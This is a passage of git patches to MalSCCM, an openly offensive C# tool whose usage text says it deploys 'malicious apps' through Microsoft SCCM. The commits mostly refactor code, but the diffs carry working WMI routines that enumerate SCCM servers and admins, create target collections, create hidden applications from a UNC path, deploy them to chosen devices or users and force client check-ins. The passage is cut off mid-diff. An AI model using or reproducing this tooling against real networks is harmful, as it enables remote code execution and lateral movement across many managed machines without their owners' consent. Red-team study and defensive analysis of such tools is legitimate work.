@"Commands listed below have optional parameters in <>. - -Attempt to find the SCCM management and primary servers: - MalSCCM.exe locate - -Inspect the primary server to gather SCCM information: - MalSCCM.exe inspect - -Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: - MalSCCM.exe group /create /groupname:example /grouptype:[user|device] - MalSCCM.exe group /delete /groupname:example - MalSCCM.exe group /addhost /groupname:example /host:examplehost - MalSCCM.exe group /adduser /groupname:example /user:exampleuser - -Create/Deploy/Delete malicious applications: - MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" - MalSCCM.exe app /delete /name:appname - MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 - MalSCCM.exe app /deletedeploy /name:appname - MalSCCM.exe app /cleanup /name:appname - -Force devices of a group to checkin within a couple minutes: - MalSCCM.exe checkin /groupname:example -"; + const string usage = """ + Commands listed below have optional parameters in <>. + + Attempt to find the SCCM management and primary servers: + MalSCCM.exe locate + + Inspect the primary server to gather SCCM information: + MalSCCM.exe inspect + + Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users: + MalSCCM.exe group /create /groupname:example /grouptype:[user|device] + MalSCCM.exe group /delete /groupname:example + MalSCCM.exe group /addhost /groupname:example /host:examplehost + MalSCCM.exe group /adduser /groupname:example /user:exampleuser + + Create/Deploy/Delete malicious applications: + MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" + MalSCCM.exe app /delete /name:appname + MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 + MalSCCM.exe app /deletedeploy /name:appname + MalSCCM.exe app /cleanup /name:appname + + Force devices of a group to checkin within a couple minutes: + MalSCCM.exe checkin /groupname:example + + """; + Console.WriteLine(usage); } } \ No newline at end of file From 7c0bf49e0066b63e829fc1cb3ea8e81fd011175d Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 17:43:05 +0100 Subject: [PATCH 4/7] Update Commands - Add CommandName as get-only property on ICommand. - Refactor existing commands. - Change CommandCollection to load commands via Reflection --- MalSCCM/Args/CommandCollection.cs | 61 +++++++++++++++++-------------- MalSCCM/Commands/App.cs | 3 +- MalSCCM/Commands/Checkin.cs | 4 +- MalSCCM/Commands/Group.cs | 5 +-- MalSCCM/Commands/ICommand.cs | 1 + MalSCCM/Commands/Inspect.cs | 4 +- MalSCCM/Commands/Locate.cs | 4 +- 7 files changed, 43 insertions(+), 39 deletions(-) diff --git a/MalSCCM/Args/CommandCollection.cs b/MalSCCM/Args/CommandCollection.cs index a7b33f2..9f0273b 100644 --- a/MalSCCM/Args/CommandCollection.cs +++ b/MalSCCM/Args/CommandCollection.cs @@ -1,47 +1,52 @@ using System; using System.Collections.Generic; +using System.Linq; + using MalSCCM.Commands; namespace MalSCCM.Args; public class CommandCollection { - private readonly Dictionary> _availableCommands = new Dictionary>(); + private readonly List _availableCommands = new(); // How To Add A New Command: - // 1. Create your command class in the Commands Folder - // a. That class must have a CommandName static property that has the Command's name - // and must also Implement the ICommand interface - // b. Put the code that does the work into the Execute() method - // 2. Add an entry to the _availableCommands dictionary in the Constructor below. + // - Create your command class in the Commands Folder + // - That class must implement the ICommand interface + // - Give the command a name + // - Put the code that does the work into the Execute() method public CommandCollection() { - _availableCommands.Add(Inspect.CommandName, () => new Inspect()); - _availableCommands.Add(Group.CommandName, () => new Group()); - _availableCommands.Add(App.CommandName, () => new App()); - _availableCommands.Add(Checkin.CommandName, () => new Checkin()); - _availableCommands.Add(Locate.CommandName, () => new Locate()); - + // instantiate each command dynamically + + var self = typeof(CommandCollection).Assembly; + + // loop through each type + foreach (var type in self.GetTypes()) + { + // ignore if they don't implement ICommand or if it's the interface itself + if (!typeof(ICommand).IsAssignableFrom(type) || type.Name.Equals("ICommand")) + continue; + + // instantiate a new instance + var command = (ICommand)Activator.CreateInstance(type); + _availableCommands.Add(command); + } } public bool ExecuteCommand(string commandName, Dictionary arguments) { - bool commandWasFound; - - if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false) - commandWasFound= false; - else - { - // Create the command object - var command = _availableCommands[commandName].Invoke(); - - // and execute it with the arguments from the command line - command.Execute(arguments); - - commandWasFound = true; - } - - return commandWasFound; + // find the correct command, case-insensitive + var command = _availableCommands.FirstOrDefault(c => + c.CommandName.Equals(commandName, StringComparison.OrdinalIgnoreCase)); + + // return false if command is null (i.e. not found) + if (command is null) + return false; + + // otherwise execute and return true + command.Execute(arguments); + return true; } } \ No newline at end of file diff --git a/MalSCCM/Commands/App.cs b/MalSCCM/Commands/App.cs index 21a21f9..0210b7c 100644 --- a/MalSCCM/Commands/App.cs +++ b/MalSCCM/Commands/App.cs @@ -6,7 +6,8 @@ namespace MalSCCM.Commands; public class App : ICommand { - public static string CommandName => "app"; + public string CommandName => "app"; + public static string AppName = ""; public static string UNCPath = ""; public static string AssignmentName = ""; diff --git a/MalSCCM/Commands/Checkin.cs b/MalSCCM/Commands/Checkin.cs index f805eaa..29eaa54 100644 --- a/MalSCCM/Commands/Checkin.cs +++ b/MalSCCM/Commands/Checkin.cs @@ -5,9 +5,7 @@ namespace MalSCCM.Commands; public class Checkin : ICommand { - - public static string CommandName => "checkin"; - + public string CommandName => "checkin"; public void Execute(Dictionary arguments) { diff --git a/MalSCCM/Commands/Group.cs b/MalSCCM/Commands/Group.cs index cf8de4e..714173d 100644 --- a/MalSCCM/Commands/Group.cs +++ b/MalSCCM/Commands/Group.cs @@ -5,8 +5,8 @@ namespace MalSCCM.Commands; public class Group : ICommand { - - public static string CommandName => "group"; + public string CommandName => "group"; + public static string GroupName = ""; public static string GroupType = ""; public static string SystemCollectionID = ""; @@ -16,7 +16,6 @@ public class Group : ICommand public static string DeviceName = ""; public static string ResourceID = ""; - public void Execute(Dictionary arguments) { if (arguments.ContainsKey("/server")) diff --git a/MalSCCM/Commands/ICommand.cs b/MalSCCM/Commands/ICommand.cs index 2c14d86..c8dfebb 100644 --- a/MalSCCM/Commands/ICommand.cs +++ b/MalSCCM/Commands/ICommand.cs @@ -4,5 +4,6 @@ namespace MalSCCM.Commands; public interface ICommand { + string CommandName { get; } void Execute(Dictionary arguments); } \ No newline at end of file diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index 2ff2ecd..7e62894 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs @@ -5,8 +5,8 @@ namespace MalSCCM.Commands; public class Inspect : ICommand { - - public static string CommandName => "inspect"; + public string CommandName => "inspect"; + public static string SiteCode = ""; public static string ServerName = "localhost"; diff --git a/MalSCCM/Commands/Locate.cs b/MalSCCM/Commands/Locate.cs index 06cbe3c..4c4dd82 100644 --- a/MalSCCM/Commands/Locate.cs +++ b/MalSCCM/Commands/Locate.cs @@ -5,8 +5,8 @@ namespace MalSCCM.Commands; public class Locate : ICommand { - - public static string CommandName => "locate"; + public string CommandName => "locate"; + public static string SiteCode = ""; public static string ServerName = "localhost"; From e4cee41b5168d3c7fb5d150e28734801daa4f91b Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 17:47:59 +0100 Subject: [PATCH 5/7] Miscellaneous code clean-up --- MalSCCM/Commands/App.cs | 23 ++++++++++----------- MalSCCM/Commands/Checkin.cs | 9 +++++---- MalSCCM/Commands/Group.cs | 21 ++++++++++--------- MalSCCM/Commands/Inspect.cs | 7 ++----- MalSCCM/Commands/Locate.cs | 4 ++-- MalSCCM/Program.cs | 6 +++--- MalSCCM/lib/Application.cs | 26 ++++++++++++------------ MalSCCM/lib/Check.cs | 11 +++++----- MalSCCM/lib/Enum.cs | 23 +++++++++++++-------- MalSCCM/lib/Groups.cs | 40 ++++++++++++++++++++++--------------- 10 files changed, 89 insertions(+), 81 deletions(-) diff --git a/MalSCCM/Commands/App.cs b/MalSCCM/Commands/App.cs index 0210b7c..20123f0 100644 --- a/MalSCCM/Commands/App.cs +++ b/MalSCCM/Commands/App.cs @@ -5,41 +5,39 @@ namespace MalSCCM.Commands; public class App : ICommand { - public string CommandName => "app"; public static string AppName = ""; public static string UNCPath = ""; public static string AssignmentName = ""; - public void Execute(Dictionary arguments) { - if (arguments.ContainsKey("/server")) + if (arguments.TryGetValue("/server", out var argument)) { - Inspect.ServerName = arguments["/server"]; + Inspect.ServerName = argument; } Console.WriteLine("[*] Action: Manipulating SCCM Applications"); - if (arguments.ContainsKey("/groupname")) + if (arguments.TryGetValue("/groupname", out var argument1)) { - Group.GroupName = arguments["/groupname"]; + Group.GroupName = argument1; } - if (arguments.ContainsKey("/name")) + if (arguments.TryGetValue("/name", out var argument2)) { - AppName = arguments["/name"]; + AppName = argument2; } - if (arguments.ContainsKey("/uncpath")) + if (arguments.TryGetValue("/uncpath", out var argument3)) { - UNCPath = arguments["/uncpath"]; + UNCPath = argument3; } - if (arguments.ContainsKey("/assignmentname")) + if (arguments.TryGetValue("/assignmentname", out var argument4)) { - AssignmentName = arguments["/assignmentname"]; + AssignmentName = argument4; } if (!Enum.FbGetSiteScope()) @@ -86,7 +84,6 @@ public void Execute(Dictionary arguments) Application.FbRemoveSCCMApplication(); } - Console.WriteLine("\r\n[*] App complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Checkin.cs b/MalSCCM/Commands/Checkin.cs index 29eaa54..af4f9ee 100644 --- a/MalSCCM/Commands/Checkin.cs +++ b/MalSCCM/Commands/Checkin.cs @@ -9,16 +9,16 @@ public class Checkin : ICommand public void Execute(Dictionary arguments) { - if (arguments.ContainsKey("/server")) + if (arguments.TryGetValue("/server", out var argument)) { - Inspect.ServerName = arguments["/server"]; + Inspect.ServerName = argument; } Console.WriteLine("[*] Action: Causing SCCM poll"); - if (arguments.ContainsKey("/groupname")) + if (arguments.TryGetValue("/groupname", out var argument1)) { - Group.GroupName = arguments["/groupname"]; + Group.GroupName = argument1; } if (!Enum.FbGetSiteScope()) @@ -38,6 +38,7 @@ public void Execute(Dictionary arguments) Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates"); Check.FbSCCMDeviceCheckin(); } + Console.WriteLine("\r\n[*] Checkin complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Group.cs b/MalSCCM/Commands/Group.cs index 714173d..09c79a5 100644 --- a/MalSCCM/Commands/Group.cs +++ b/MalSCCM/Commands/Group.cs @@ -18,31 +18,31 @@ public class Group : ICommand public void Execute(Dictionary arguments) { - if (arguments.ContainsKey("/server")) + if (arguments.TryGetValue("/server", out var argument)) { - Inspect.ServerName = arguments["/server"]; + Inspect.ServerName = argument; } Console.WriteLine("[*] Action: Manipulating SCCM Groups"); - if (arguments.ContainsKey("/groupname")) + if (arguments.TryGetValue("/groupname", out var argument1)) { - GroupName = arguments["/groupname"]; + GroupName = argument1; } - if (arguments.ContainsKey("/grouptype")) + if (arguments.TryGetValue("/grouptype", out var argument2)) { - GroupType = arguments["/grouptype"]; + GroupType = argument2; } - if (arguments.ContainsKey("/user")) + if (arguments.TryGetValue("/user", out var argument3)) { - UserName = arguments["/user"]; + UserName = argument3; } - if (arguments.ContainsKey("/host")) + if (arguments.TryGetValue("/host", out var argument4)) { - DeviceName = arguments["/host"]; + DeviceName = argument4; } if (!Enum.FbGetSiteScope()) @@ -91,7 +91,6 @@ public void Execute(Dictionary arguments) Groups.FbAddDeviceToSCCMCollection(); } - Console.WriteLine("\r\n[*] Group complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index 7e62894..efebf75 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs @@ -12,9 +12,9 @@ public class Inspect : ICommand public void Execute(Dictionary arguments) { - if (arguments.ContainsKey("/server")) + if (arguments.TryGetValue("/server", out var argument)) { - ServerName = arguments["/server"]; + ServerName = argument; } Console.WriteLine("[*] Action: Inspect SCCM Server"); @@ -90,9 +90,6 @@ public void Execute(Dictionary arguments) Enum.FbGetSCCMDeployments(); } - - - Console.WriteLine("\r\n[*] Inspect complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/Commands/Locate.cs b/MalSCCM/Commands/Locate.cs index 4c4dd82..c9e42bd 100644 --- a/MalSCCM/Commands/Locate.cs +++ b/MalSCCM/Commands/Locate.cs @@ -12,9 +12,9 @@ public class Locate : ICommand public void Execute(Dictionary arguments) { - if (arguments.ContainsKey("/server")) + if (arguments.TryGetValue("/server", out var argument)) { - ServerName = arguments["/server"]; + ServerName = argument; } Console.WriteLine("[*] Action: Locating SCCM Management Servers"); diff --git a/MalSCCM/Program.cs b/MalSCCM/Program.cs index b3c2457..43e0470 100644 --- a/MalSCCM/Program.cs +++ b/MalSCCM/Program.cs @@ -1,10 +1,11 @@ using System; using System.Collections.Generic; + using MalSCCM.Args; namespace MalSCCM; -class Program +public static class Program { private static void MainExecute(string commandName, Dictionary parsedArgs) { @@ -31,6 +32,7 @@ public static void Main(string[] args) { // try to parse the command line arguments, show usage on failure and then bail var parsed = ArgumentParser.Parse(args); + if (parsed.ParsedOk == false) { Info.ShowLogo(); @@ -39,8 +41,6 @@ public static void Main(string[] args) } var commandName = args.Length != 0 ? args[0] : ""; - MainExecute(commandName, parsed.Arguments); - } } \ No newline at end of file diff --git a/MalSCCM/lib/Application.cs b/MalSCCM/lib/Application.cs index 61aa64e..ca1ee90 100644 --- a/MalSCCM/lib/Application.cs +++ b/MalSCCM/lib/Application.cs @@ -1,21 +1,22 @@ using System; using System.Management; using System.Text; + using MalSCCM.Commands; -public class Application +public static class Application { public static bool FbCreateSCCMApplication() { try { - ManagementClass IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification"); - ManagementClass AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application"); + var IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification"); + var AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application"); object[] methodArgs = {null}; - object result = IDClass.InvokeMethod("GetSiteID", methodArgs); - string scopeid = (string)methodArgs[0]; + var result = IDClass.InvokeMethod("GetSiteID", methodArgs); + var scopeid = (string)methodArgs[0]; var trimscopeid = "ScopeId_" + scopeid.Trim(new char[] { '{', '}' }); Console.WriteLine("ScopeID: " + trimscopeid); @@ -27,7 +28,7 @@ public static bool FbCreateSCCMApplication() var NewFileID = "File_" + Guid.NewGuid(); Console.WriteLine("NewFileID: " + NewFileID); - StringBuilder xml = new StringBuilder(); + var xml = new StringBuilder(); xml.AppendLine(@"" + App.AppName + @"" + App.AppName + @"" + App.AppName + @"GLOBAL/ScriptDeploymentTechnologyScriptNativeSystemLocalSystem<?xml version=""1.0"" encoding=""utf-16""?>"); xml.AppendLine(@"<EnhancedDetectionMethod xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"">"); @@ -58,7 +59,7 @@ public static bool FbCreateSCCMApplication() Console.WriteLine("Creating Instance"); - ManagementObject newInstance = AppClass.CreateInstance(); + var newInstance = AppClass.CreateInstance(); newInstance["SDMPackageXML"] = xml.ToString(); newInstance["IsHidden"] = true; @@ -85,7 +86,7 @@ public static bool FbRemoveSCCMApplication() var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -111,7 +112,7 @@ public static bool FbDeploySCCMApplication() { try { - ManagementClass AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); + var AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); var TargetCollectionID = Group.TargetCollectionID; var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); @@ -119,7 +120,7 @@ public static bool FbDeploySCCMApplication() mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var CI_ID = ""; - int CI_IDint = 0; + var CI_IDint = 0; var CI_UniqueID = ""; foreach (var result in mgmtSrchr.Get()) @@ -131,7 +132,7 @@ public static bool FbDeploySCCMApplication() var Date = DateTime.Now.ToString("yyyyMMddHHmmss") + ".000000+***"; - ManagementObject newInstance = AppAssignementClass.CreateInstance(); + var newInstance = AppAssignementClass.CreateInstance(); newInstance["ApplicationName"] = App.AppName; newInstance["AssignmentName"] = App.AssignmentName; @@ -180,7 +181,7 @@ public static bool FbRemoveSCCMApplicationDeployment() var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -200,5 +201,4 @@ public static bool FbRemoveSCCMApplicationDeployment() return false; } } - } diff --git a/MalSCCM/lib/Check.cs b/MalSCCM/lib/Check.cs index a586681..8992f5e 100644 --- a/MalSCCM/lib/Check.cs +++ b/MalSCCM/lib/Check.cs @@ -1,20 +1,21 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Check +public static class Check { public static bool FbSCCMDeviceCheckin() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation"); - ManagementBaseObject newInstance = Class.GetMethodParameters("InitiateClientOperation"); + var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation"); + var newInstance = Class.GetMethodParameters("InitiateClientOperation"); newInstance["Type"] = 8; newInstance["TargetCollectionID"] = Group.TargetCollectionID; - ManagementBaseObject result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); + var result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); Console.WriteLine("ReturnValue: " + result.GetPropertyValue("ReturnValue")); Console.WriteLine("OperationID: " + result.GetPropertyValue("OperationID")); @@ -22,7 +23,6 @@ public static bool FbSCCMDeviceCheckin() Console.WriteLine("Checkin succeeded."); return true; - } catch (Exception e) { @@ -32,5 +32,4 @@ public static bool FbSCCMDeviceCheckin() return false; } } - } diff --git a/MalSCCM/lib/Enum.cs b/MalSCCM/lib/Enum.cs index 5f06653..de571ff 100644 --- a/MalSCCM/lib/Enum.cs +++ b/MalSCCM/lib/Enum.cs @@ -1,9 +1,10 @@ using System; using System.Management; using Microsoft.Win32; + using MalSCCM.Commands; -public class Enum +public static class Enum { public static bool FbGetSiteScope() { @@ -18,7 +19,6 @@ public static bool FbGetSiteScope() { var siteCode = result.GetPropertyValue("Name").ToString(); var managementServer = result.GetPropertyValue("CurrentManagementPoint").ToString(); - if (!string.IsNullOrEmpty(siteCode)) { @@ -41,6 +41,7 @@ public static bool FbGetSiteScope() return false; } } + public static bool FbGetSiteScope2() { try @@ -74,12 +75,13 @@ public static bool FbGetSiteScope2() return false; } } + public static bool FbGetSiteScope3() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Mobile Client"; - string assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); + var assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); Console.WriteLine("SiteCode: " + assignedsitecode); Inspect.SiteCode = assignedsitecode; @@ -94,6 +96,7 @@ public static bool FbGetSiteScope3() return false; } } + public static bool FbGetSCCMComputer() { try @@ -122,6 +125,7 @@ public static bool FbGetSCCMComputer() return false; } } + public static bool FbGetSCCMADForest() { try @@ -150,6 +154,7 @@ public static bool FbGetSCCMADForest() return false; } } + public static bool FbGetSCCMApplication() { try @@ -178,6 +183,7 @@ public static bool FbGetSCCMApplication() return false; } } + public static bool FbGetSCCMPackage() { try @@ -206,6 +212,7 @@ public static bool FbGetSCCMPackage() return false; } } + public static bool FbGetSCCMCollection() { try @@ -273,6 +280,7 @@ public static bool FbGetSCCMPrimaryUser() return false; } } + public static bool FbGetSCCMDeployments() { try @@ -306,16 +314,17 @@ public static bool FbGetSCCMDeployments() return false; } } + public static bool FbGetSCCMPrimaryServerRegKey() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\DP"; - string mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); - string siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); + var mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); + var siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); const string keyNameID = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Identification"; - string siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); + var siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); Console.WriteLine("Management Server: {0}", mgmtServer); Console.WriteLine("Primary Server: {0}", siteServer); @@ -331,6 +340,4 @@ public static bool FbGetSCCMPrimaryServerRegKey() return false; } } - - } diff --git a/MalSCCM/lib/Groups.cs b/MalSCCM/lib/Groups.cs index e5ca37c..796f4d4 100644 --- a/MalSCCM/lib/Groups.cs +++ b/MalSCCM/lib/Groups.cs @@ -1,8 +1,9 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Groups +public static class Groups { public static bool FbGetSCCMCollectionID() { @@ -47,12 +48,13 @@ public static bool FbGetSCCMCollectionID() return false; } } + public static bool FbNewSCCMCollection() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection"); - ManagementObject newInstance = Class.CreateInstance(); + var Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection"); + var newInstance = Class.CreateInstance(); newInstance["Name"] = Group.GroupName; newInstance["OwnedByThisSite"] = "True"; @@ -84,15 +86,16 @@ public static bool FbNewSCCMCollection() return false; } } + public static bool FbRemoveSCCMCollection() { try { - ManagementObject objHostSetting = new ManagementObject(); + var objHostSetting = new ManagementObject(); objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); //define lookup query - string strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; + var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; objHostSetting.Path = new ManagementPath(strQuery); //delete the Managementobject @@ -109,6 +112,7 @@ public static bool FbRemoveSCCMCollection() return false; } } + public static bool FbGetUserResourceID() { try @@ -139,24 +143,25 @@ public static bool FbGetUserResourceID() return false; } } + public static bool FbAddUserToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -168,6 +173,7 @@ public static bool FbAddUserToSCCMCollection() return false; } } + // To Do public static bool FbRemoveUserFromSCCMCollection() { @@ -184,24 +190,25 @@ public static bool FbRemoveUserFromSCCMCollection() return false; } } + public static bool FbAddDeviceToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -213,6 +220,7 @@ public static bool FbAddDeviceToSCCMCollection() return false; } } + // To Do public static bool FbRemoveDeviceFromSCCMCollection() { @@ -229,4 +237,4 @@ public static bool FbRemoveDeviceFromSCCMCollection() return false; } } -} +} \ No newline at end of file From 4c841bdc1a97cab1f5049d444dc9cc89962ad3e3 Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 28 Sep 2023 18:21:43 +0100 Subject: [PATCH 6/7] Add FbGetSCCMAdmins --- MalSCCM/Commands/Inspect.cs | 9 +++++- MalSCCM/lib/Application.cs | 12 ++++---- MalSCCM/lib/Check.cs | 2 +- MalSCCM/lib/Enum.cs | 57 +++++++++++++++++++++++++++++++------ MalSCCM/lib/Groups.cs | 16 +++++------ 5 files changed, 71 insertions(+), 25 deletions(-) diff --git a/MalSCCM/Commands/Inspect.cs b/MalSCCM/Commands/Inspect.cs index efebf75..ff51ee6 100644 --- a/MalSCCM/Commands/Inspect.cs +++ b/MalSCCM/Commands/Inspect.cs @@ -31,7 +31,6 @@ public void Execute(Dictionary arguments) if (arguments.ContainsKey("/all")) { - Console.WriteLine("\r\n[*] Action: Get SCCM Computers"); Enum.FbGetSCCMComputer(); Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest"); @@ -46,6 +45,8 @@ public void Execute(Dictionary arguments) Enum.FbGetSCCMPrimaryUser(); Console.WriteLine("\r\n[*] Action: Get SCCM Deployments"); Enum.FbGetSCCMDeployments(); + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); } if (arguments.ContainsKey("/computers")) @@ -90,6 +91,12 @@ public void Execute(Dictionary arguments) Enum.FbGetSCCMDeployments(); } + if (arguments.ContainsKey("/admins")) + { + Console.WriteLine("\r\n[*] Action: Get SCCM Admins"); + Enum.FbGetSCCMAdmins(); + } + Console.WriteLine("\r\n[*] Inspect complete\r\n"); } } \ No newline at end of file diff --git a/MalSCCM/lib/Application.cs b/MalSCCM/lib/Application.cs index ca1ee90..a0da2df 100644 --- a/MalSCCM/lib/Application.cs +++ b/MalSCCM/lib/Application.cs @@ -10,8 +10,8 @@ public static bool FbCreateSCCMApplication() { try { - var IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification"); - var AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application"); + var IDClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Identification"); + var AppClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Application"); object[] methodArgs = {null}; @@ -83,7 +83,7 @@ public static bool FbRemoveSCCMApplication() try { var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var objColl = mgmtSrchr.Get(); @@ -112,11 +112,11 @@ public static bool FbDeploySCCMApplication() { try { - var AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); + var AppAssignementClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); var TargetCollectionID = 